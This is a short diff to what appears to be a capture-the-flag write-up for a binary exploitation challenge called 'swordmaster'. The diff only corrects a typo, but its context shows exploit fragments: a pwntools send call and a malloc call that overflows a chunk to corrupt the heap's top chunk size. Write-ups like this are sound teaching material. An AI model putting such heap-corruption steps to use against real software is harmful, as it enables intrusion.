stigward/stigward.github.io/_posts/2022-09-26-swordmaster-pwn-chal.md

   p.sendline(data)
 ```

 Now we need to corrupt the top chunk size.
-We can do this programatically the same way we did manually earlier:
+We can do this programmatically the same way we did manually earlier:

 ```python
 malloc(40, b'\x41'*47)